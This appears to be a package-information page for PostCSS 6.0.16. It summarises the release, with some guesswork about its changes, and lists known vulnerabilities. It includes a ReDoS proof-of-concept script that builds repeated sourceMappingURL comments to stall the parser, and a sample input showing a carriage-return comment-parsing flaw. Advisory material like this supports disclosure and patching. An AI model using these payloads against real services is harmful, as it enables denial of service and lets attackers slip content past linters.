PostCSS version 6.0.16 represents a minor update over its predecessor, version 6.0.15, within the popular PostCSS ecosystem designed for transforming CSS with JavaScript plugins. Inspecting the metadata reveals a seemingly incremental change, primarily reflected in the release date. Version 6.0.16 was published on January 6, 2018, shortly after version 6.0.15, which was released on January 2, 2018. The core dependencies remain consistent, utilizing the same versions of "chalk" for stylized console output, "source-map" for debugging compiled code, and "supports-color" for detecting terminal color capabilities. This suggests the update likely involves bug fixes, performance enhancements, or minor internal adjustments rather than significant feature additions or breaking changes.
For developers using PostCSS, this information is crucial. The lack of dependency updates implies a smooth transition between versions. Upgrading from 6.0.15 to 6.0.16 should be relatively straightforward, minimizing the risk of compatibility issues. Developers should consult the official PostCSS changelog or repository commit history for a detailed breakdown of the specific changes included in version 6.0.16. This will provide insights into any bug fixes or performance improvements relevant to their projects, ensuring they leverage the most stable and optimized version of this powerful CSS transformation tool. The MIT license continues to offer flexibility for use in various projects. The quick release suggests a reactive fix or improvement.
All the vulnerabilities related to the version 6.0.16 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.